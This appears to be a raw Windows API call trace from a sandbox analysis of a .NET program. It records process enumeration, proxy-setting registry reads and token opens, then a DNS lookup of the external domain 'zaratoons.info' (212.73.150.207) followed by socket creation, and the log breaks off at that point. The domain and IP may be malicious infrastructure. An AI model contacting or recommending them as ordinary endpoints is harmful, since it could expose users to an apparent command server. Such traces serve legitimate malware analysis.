	[0902.094] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x418, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c69d868, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c69d868*=0x41c) returned 1
	[0902.095] CloseHandle (hObject=0x41c) returned 1
	[0902.095] CloseHandle (hObject=0x418) returned 1
	[0902.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1668) returned 0x418
	[0902.095] GetProcessTimes (in: hProcess=0x418, lpCreationTime=0x1c69d910, lpExitTime=0x1c69d908, lpKernelTime=0x1c69d900, lpUserTime=0x1c69d8f8 | out: lpCreationTime=0x1c69d910, lpExitTime=0x1c69d908, lpKernelTime=0x1c69d900, lpUserTime=0x1c69d8f8) returned 1
	[0902.095] CloseHandle (hObject=0x418) returned 1
	[0902.095] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x1668) returned 0x418
	[0902.095] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.095] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.095] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x418, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c69d868, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c69d868*=0x41c) returned 1
	[0902.095] CloseHandle (hObject=0x41c) returned 1
	[0902.096] CloseHandle (hObject=0x418) returned 1
	[0902.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14f0) returned 0x418
	[0902.096] GetProcessTimes (in: hProcess=0x418, lpCreationTime=0x1c69d910, lpExitTime=0x1c69d908, lpKernelTime=0x1c69d900, lpUserTime=0x1c69d8f8 | out: lpCreationTime=0x1c69d910, lpExitTime=0x1c69d908, lpKernelTime=0x1c69d900, lpUserTime=0x1c69d8f8) returned 1
	[0902.096] CloseHandle (hObject=0x418) returned 1
	[0902.096] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x14f0) returned 0x418
	[0902.096] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.096] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.096] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x418, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c69d868, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c69d868*=0x41c) returned 1
	[0902.096] CloseHandle (hObject=0x41c) returned 1
	[0902.096] CloseHandle (hObject=0x418) returned 1
	[0902.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf2c) returned 0x418
	[0902.097] GetProcessTimes (in: hProcess=0x418, lpCreationTime=0x1c69d910, lpExitTime=0x1c69d908, lpKernelTime=0x1c69d900, lpUserTime=0x1c69d8f8 | out: lpCreationTime=0x1c69d910, lpExitTime=0x1c69d908, lpKernelTime=0x1c69d900, lpUserTime=0x1c69d8f8) returned 1
	[0902.097] CloseHandle (hObject=0x418) returned 1
	[0902.097] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf2c) returned 0x418
	[0902.097] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.097] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.097] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x418, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c69d868, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c69d868*=0x41c) returned 1
	[0902.097] CloseHandle (hObject=0x41c) returned 1
	[0902.097] CloseHandle (hObject=0x418) returned 1
	[0902.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9b8) returned 0x418
	[0902.097] GetProcessTimes (in: hProcess=0x418, lpCreationTime=0x1c69d910, lpExitTime=0x1c69d908, lpKernelTime=0x1c69d900, lpUserTime=0x1c69d8f8 | out: lpCreationTime=0x1c69d910, lpExitTime=0x1c69d908, lpKernelTime=0x1c69d900, lpUserTime=0x1c69d8f8) returned 1
	[0902.097] CloseHandle (hObject=0x418) returned 1
	[0902.098] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x9b8) returned 0x418
	[0902.098] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.098] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.098] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x418, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c69d868, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c69d868*=0x41c) returned 1
	[0902.098] CloseHandle (hObject=0x41c) returned 1
	[0902.098] CloseHandle (hObject=0x418) returned 1
	[0902.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcb0) returned 0x418
	[0902.098] GetProcessTimes (in: hProcess=0x418, lpCreationTime=0x1c69d910, lpExitTime=0x1c69d908, lpKernelTime=0x1c69d900, lpUserTime=0x1c69d8f8 | out: lpCreationTime=0x1c69d910, lpExitTime=0x1c69d908, lpKernelTime=0x1c69d900, lpUserTime=0x1c69d8f8) returned 1
	[0902.098] CloseHandle (hObject=0x418) returned 1
	[0902.098] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xcb0) returned 0x418
	[0902.099] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.099] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.099] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x418, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c69d868, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c69d868*=0x41c) returned 1
	[0902.099] CloseHandle (hObject=0x41c) returned 1
	[0902.099] CloseHandle (hObject=0x418) returned 1
	[0902.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf10) returned 0x418
	[0902.099] GetProcessTimes (in: hProcess=0x418, lpCreationTime=0x1c69d910, lpExitTime=0x1c69d908, lpKernelTime=0x1c69d900, lpUserTime=0x1c69d8f8 | out: lpCreationTime=0x1c69d910, lpExitTime=0x1c69d908, lpKernelTime=0x1c69d900, lpUserTime=0x1c69d8f8) returned 1
	[0902.099] CloseHandle (hObject=0x418) returned 1
	[0902.099] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf10) returned 0x418
	[0902.100] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.100] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.100] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x418, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c69d868, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c69d868*=0x41c) returned 1
	[0902.100] CloseHandle (hObject=0x41c) returned 1
	[0902.100] CloseHandle (hObject=0x418) returned 1
	[0902.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf18) returned 0x418
	[0902.100] GetProcessTimes (in: hProcess=0x418, lpCreationTime=0x1c69d910, lpExitTime=0x1c69d908, lpKernelTime=0x1c69d900, lpUserTime=0x1c69d8f8 | out: lpCreationTime=0x1c69d910, lpExitTime=0x1c69d908, lpKernelTime=0x1c69d900, lpUserTime=0x1c69d8f8) returned 1
	[0902.100] CloseHandle (hObject=0x418) returned 1
	[0902.100] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf18) returned 0x418
	[0902.101] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.101] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.101] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x418, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c69d868, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c69d868*=0x41c) returned 1
	[0902.101] CloseHandle (hObject=0x41c) returned 1
	[0902.101] CloseHandle (hObject=0x418) returned 1
	[0902.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf64) returned 0x418
	[0902.101] GetProcessTimes (in: hProcess=0x418, lpCreationTime=0x1c69d910, lpExitTime=0x1c69d908, lpKernelTime=0x1c69d900, lpUserTime=0x1c69d8f8 | out: lpCreationTime=0x1c69d910, lpExitTime=0x1c69d908, lpKernelTime=0x1c69d900, lpUserTime=0x1c69d8f8) returned 1
	[0902.101] CloseHandle (hObject=0x418) returned 1
	[0902.101] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf64) returned 0x418
	[0902.101] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.101] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.101] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x418, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c69d868, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c69d868*=0x41c) returned 1
	[0902.102] CloseHandle (hObject=0x41c) returned 1
	[0902.102] CloseHandle (hObject=0x418) returned 1
	[0902.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf38) returned 0x418
	[0902.102] GetProcessTimes (in: hProcess=0x418, lpCreationTime=0x1c69d910, lpExitTime=0x1c69d908, lpKernelTime=0x1c69d900, lpUserTime=0x1c69d8f8 | out: lpCreationTime=0x1c69d910, lpExitTime=0x1c69d908, lpKernelTime=0x1c69d900, lpUserTime=0x1c69d8f8) returned 1
	[0902.102] CloseHandle (hObject=0x418) returned 1
	[0902.102] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf38) returned 0x418
	[0902.102] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.102] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.102] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x418, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c69d868, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c69d868*=0x41c) returned 1
	[0902.102] CloseHandle (hObject=0x41c) returned 1
	[0902.103] CloseHandle (hObject=0x418) returned 1
	[0902.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf6c) returned 0x418
	[0902.103] GetProcessTimes (in: hProcess=0x418, lpCreationTime=0x1c69d910, lpExitTime=0x1c69d908, lpKernelTime=0x1c69d900, lpUserTime=0x1c69d8f8 | out: lpCreationTime=0x1c69d910, lpExitTime=0x1c69d908, lpKernelTime=0x1c69d900, lpUserTime=0x1c69d8f8) returned 1
	[0902.103] CloseHandle (hObject=0x418) returned 1
	[0902.103] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf6c) returned 0x418
	[0902.103] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.103] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.103] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x418, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c69d868, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c69d868*=0x41c) returned 1
	[0902.103] CloseHandle (hObject=0x41c) returned 1
	[0902.104] CloseHandle (hObject=0x418) returned 1
	[0902.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf54) returned 0x418
	[0902.104] GetProcessTimes (in: hProcess=0x418, lpCreationTime=0x1c69d910, lpExitTime=0x1c69d908, lpKernelTime=0x1c69d900, lpUserTime=0x1c69d8f8 | out: lpCreationTime=0x1c69d910, lpExitTime=0x1c69d908, lpKernelTime=0x1c69d900, lpUserTime=0x1c69d8f8) returned 1
	[0902.104] CloseHandle (hObject=0x418) returned 1
	[0902.104] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xf54) returned 0x418
	[0902.104] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.104] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.104] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x418, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c69d868, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c69d868*=0x41c) returned 1
	[0902.104] CloseHandle (hObject=0x41c) returned 1
	[0902.104] CloseHandle (hObject=0x418) returned 1
	[0902.106] ReleaseMutex (hMutex=0x40c) returned 1
	[0902.106] CloseHandle (hObject=0x40c) returned 1
	[0902.106] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fe67b8, cbSid=0x1c69d970 | out: pSid=0x2fe67b8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c69d970) returned 1
	[0902.106] CreateMutexW (lpMutexAttributes=0x2fe6970, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0902.106] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x40c
	[0902.106] WaitForSingleObject (hHandle=0x40c, dwMilliseconds=0x1f4) returned 0x0
	[0902.112] ReleaseMutex (hMutex=0x40c) returned 1
	[0902.112] CloseHandle (hObject=0x40c) returned 1
	[0902.112] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fe7600, cbSid=0x1c69d970 | out: pSid=0x2fe7600*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c69d970) returned 1
	[0902.113] CreateMutexW (lpMutexAttributes=0x2fe77b8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0902.113] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x40c
	[0902.113] WaitForSingleObject (hHandle=0x40c, dwMilliseconds=0x1f4) returned 0x0
	[0902.137] ReleaseMutex (hMutex=0x40c) returned 1
	[0902.137] CloseHandle (hObject=0x40c) returned 1
	[0902.137] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fe8458, cbSid=0x1c69d970 | out: pSid=0x2fe8458*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c69d970) returned 1
	[0902.138] CreateMutexW (lpMutexAttributes=0x2fe8610, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0902.138] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x40c
	[0902.138] WaitForSingleObject (hHandle=0x40c, dwMilliseconds=0x1f4) returned 0x0
	[0902.139] ReleaseMutex (hMutex=0x40c) returned 1
	[0902.139] CloseHandle (hObject=0x40c) returned 1
	[0902.140] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fe92a8, cbSid=0x1c69d970 | out: pSid=0x2fe92a8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c69d970) returned 1
	[0902.140] CreateMutexW (lpMutexAttributes=0x2fe9460, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0902.140] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x40c
	[0902.140] WaitForSingleObject (hHandle=0x40c, dwMilliseconds=0x1f4) returned 0x0
	[0902.142] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fea0f8, cbSid=0x1c69d920 | out: pSid=0x2fea0f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c69d920) returned 1
	[0902.142] CreateMutexW (lpMutexAttributes=0x2fea2b0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0902.142] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x40c
	[0902.143] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2feaf38, cbSid=0x1c69d920 | out: pSid=0x2feaf38*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c69d920) returned 1
	[0902.143] CreateMutexW (lpMutexAttributes=0x2feb0f0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0902.143] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x40c
	[0902.144] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2febd70, cbSid=0x1c69d920 | out: pSid=0x2febd70*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c69d920) returned 1
	[0902.144] CreateMutexW (lpMutexAttributes=0x2febf28, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0902.144] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x40c
	[0902.173] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fecbb8, cbSid=0x1c69d920 | out: pSid=0x2fecbb8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c69d920) returned 1
	[0902.173] CreateMutexW (lpMutexAttributes=0x2fecd70, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0902.173] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x40c
	[0902.174] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fed9f8, cbSid=0x1c69d920 | out: pSid=0x2fed9f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c69d920) returned 1
	[0902.174] CreateMutexW (lpMutexAttributes=0x2fedbb0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0902.174] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x40c
	[0902.174] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x418
	[0902.175] ioctlsocket (in: s=0x40c, cmd=-2147195266, argp=0x1c69df58 | out: argp=0x1c69df58) returned 0
	[0902.175] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x41c
	[0902.175] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x420
	[0902.175] ioctlsocket (in: s=0x41c, cmd=-2147195266, argp=0x1c69df58 | out: argp=0x1c69df58) returned 0
	[0902.176] WSAIoctl (in: s=0x40c, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c69ded0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c69ded0, lpOverlapped=0x0) returned -1
	[0902.177] CoTaskMemAlloc (cb=0x204) returned 0x356750
	[0902.177] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x356750, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0902.177] CoTaskMemFree (pv=0x356750) 
	[0902.178] WSAEventSelect (s=0x40c, hEventObject=0x418, lNetworkEvents=512) returned 0
	[0902.178] WSAIoctl (in: s=0x41c, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c69ded0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c69ded0, lpOverlapped=0x0) returned -1
	[0902.178] CoTaskMemAlloc (cb=0x204) returned 0x356750
	[0902.178] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x356750, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0902.178] CoTaskMemFree (pv=0x356750) 
	[0902.178] WSAEventSelect (s=0x41c, hEventObject=0x420, lNetworkEvents=512) returned 0
	[0902.178] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x424
	[0902.179] RasConnectionNotificationW (param_1=0xffffffffffffffff, param_2=0x424, param_3=0x3) returned 0x0
	[0902.247] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x1c69e010 | out: phkResult=0x1c69e010*=0x43c) returned 0x0
	[0902.249] RegOpenKeyExW (in: hKey=0x43c, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c69def8 | out: phkResult=0x1c69def8*=0x440) returned 0x0
	[0902.249] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x444
	[0902.250] RegNotifyChangeKeyValue (hKey=0x440, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x444, fAsynchronous=1) returned 0x0
	[0902.250] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c69df20 | out: phkResult=0x1c69df20*=0x448) returned 0x0
	[0902.251] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x44c
	[0902.251] RegNotifyChangeKeyValue (hKey=0x448, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x44c, fAsynchronous=1) returned 0x0
	[0902.251] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c69df20 | out: phkResult=0x1c69df20*=0x450) returned 0x0
	[0902.251] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x454
	[0902.251] RegNotifyChangeKeyValue (hKey=0x450, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x454, fAsynchronous=1) returned 0x0
	[0902.251] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.251] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c69de88 | out: TokenHandle=0x1c69de88*=0x458) returned 1
	[0902.257] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.257] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c69d658 | out: TokenHandle=0x1c69d658*=0x45c) returned 1
	[0902.262] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.262] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c69d658 | out: TokenHandle=0x1c69d658*=0x460) returned 1
	[0902.272] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x1c69df58 | out: pProxyConfig=0x1c69df58) returned 1
	[0904.433] SetEvent (hEvent=0x38c) returned 1
	[0905.199] GetCurrentProcess () returned 0xffffffffffffffff
	[0905.199] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c69d6c8 | out: TokenHandle=0x1c69d6c8*=0x4b0) returned 1
	[0905.203] GetCurrentProcess () returned 0xffffffffffffffff
	[0905.203] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c69d6c8 | out: TokenHandle=0x1c69d6c8*=0x4b4) returned 1
	[0905.204] SetEvent (hEvent=0x38c) returned 1
	[0905.530] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x1c69db98 | out: pFixedInfo=0x0, pOutBufLen=0x1c69db98) returned 0x6f
	[0905.768] LocalAlloc (uFlags=0x0, uBytes=0x258) returned 0x1b87a1c0
	[0905.768] GetNetworkParams (in: pFixedInfo=0x1b87a1c0, pOutBufLen=0x1c69db98 | out: pFixedInfo=0x1b87a1c0, pOutBufLen=0x1c69db98) returned 0x0
	[0905.898] CoTaskMemAlloc (cb=0xd) returned 0x1b872090
	[0905.898] inet_addr (cp="192.168.0.1") returned 0x100a8c0
	[0905.898] CoTaskMemFree (pv=0x1b872090) 
	[0905.901] LocalFree (hMem=0x1b87a1c0) returned 0x0
	[0905.914] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4c8
	[0905.915] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4c4
	[0905.917] CoTaskMemAlloc (cb=0x10) returned 0x1b872090
	[0905.918] getaddrinfo (in: pNodeName="zaratoons.info", pServiceName=0x0, pHints=0x1c69db40*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1c69db38 | out: ppResult=0x1c69db38*=0x1b871050*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="zaratoons.info", ai_addr=0x1b8720f0*(sa_family=2, sin_port=0x0, sin_addr="212.73.150.207"), ai_next=0x0)) returned 0
	[0907.450] CoTaskMemFree (pv=0x1b872090) 
	[0907.450] CoTaskMemFree (pv=0x0) 
	[0907.451] FreeAddrInfoW (pAddrInfo=0x1b871050*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="慺慲潴湯⹳湩潦", ai_addr=0x1b8720f0*(sa_family=2, sin_port=0x0, sin_addr="212.73.150.207"), ai_next=0x0)) 
	[0907.452] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4d8
	[0907.452] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4d0
	[0907.452] ioctlsocket (in: s=0x4d8, cmd=-2147195266, argp=0x1c69db58 | out: argp=0x1c69db58) returned 0
	[0907.453] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4e0
	[0907.453] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4e4
	[0907.453] ioctlsocket (in: s=0x4e0, cmd=-2147195266, argp=0x1c69db58 | out: argp=0x1c69db58) returned 0
	[0907.453] WSAIoctl (in: s=0x4d8, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c69dad0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c69dad0, lpOverlapped=0x0) returned -1
	[0907.453] CoTaskMemAlloc (cb=0x204) returned 0x356750
	[0907.453] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x356750, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0907.453] CoTaskMemFree (pv=0x356750) 
	[0907.453] WSAEventSelect (s=0x4d8, hEventObject=0x4d0, lNetworkEvents=512) returned 0
	[0907.453] WSAIoctl (in: s=0x4e0, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c69dad0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c69dad0, lpOverlapped=0x0) returned -1
	[0907.453] CoTaskMemAlloc (cb=0x204) returned 0x356750
